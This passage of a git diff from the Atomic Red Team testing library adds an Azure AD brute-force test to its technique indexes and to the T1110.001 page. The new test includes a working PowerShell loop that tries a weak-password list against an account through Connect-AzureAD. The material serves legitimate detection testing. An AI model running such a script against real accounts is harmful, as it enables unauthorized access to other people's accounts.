ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006
","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techni
queID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":
"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"en
abled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/r
edcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.
com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b8f07370..d5a392a7 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -59,6 +59,7 @@ credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a548ba38..61ce7560 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -9,6 +9,7 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 8469a3a7..debc08d8 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -98,6 +98,7 @@
 - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
 - Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
 - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
+ - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
 - Atomic Test #1: Password Spray all Domain Users [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d44165af..4517c9e3 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -30,7 +30,8 @@
 - Atomic Test #1: Packet Capture Linux [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
+ - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
 - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index ca519231..1b4a0a45 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -21,7 +21,7 @@ | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | [Unix Shell](../../T1059.004/T1059.004.md) 
| Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External 
Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 59dc6eed..c3270f93 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -4425,6 +4425,55 @@ credential-access:
 }
 }
 Write-Host "End of bruteforce"
+ - name: Brute Force Credentials of single Azure AD user
+ auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+ description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
+
+'
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Account to bruteforce. We encourage users running this atomic
+ to add a valid microsoft account domain; for eg "bruce.wayne@"
+ type: String
+ default: bruce.wayne@contoso.com
+ passwords:
+ description: List of passwords we will attempt to brute force with
+ type: String
+ default: Password1`n1q2w3e4r`nPassword!
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'AzureAD module must be installed.
+
+'
+ prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Import-Module -Name AzureAD
+
+ $passwords = "#{passwords}".split("{`n}")
+ foreach($password in $passwords) {
+ $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ try {
+ Write-Host " [-] Attempting ${password} on account #{username}."
+ Connect-AzureAD -Credential $Credential 2>&1> $null
+ # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+ Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+ break
+ } catch {
+ Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+ }
+ }
+ Write-Host "End of bruteforce"
 T1555.005:
 technique:
 external_references:
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md
index bb98a2d2..c76ba1bd 100644
--- a/atomics/T1110.001/T1110.001.md
+++ b/atomics/T1110.001/T1110.001.md
@@ -29,6 +29,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #2 - Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)](#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos) +- [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user) +
@@ -131,4 +133,66 @@ Write-Host "End of bruteforce" +
+
+ +## Atomic Test #3 - Brute Force Credentials of single Azure AD user +Attempt to brute force Azure AD user via AzureAD powershell module. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** 5a51ef57-299e-4d62-8e11-2d440df55e69 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@" | String | bruce.wayne@contoso.com| +| passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Import-Module -Name AzureAD + +$passwords = "#{passwords}".split("{`n}") +foreach($password in $passwords) { + $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + try { + Write-Host " [-] Attempting ${password} on account #{username}." + Connect-AzureAD -Credential $Credential 2>&1> $null + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{username}:${password} are valid credentials!`r`n" + break + } catch { + Write-Host " [-] #{username}:${password} invalid credentials.`r`n" + } +} +Write-Host "End of bruteforce" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must 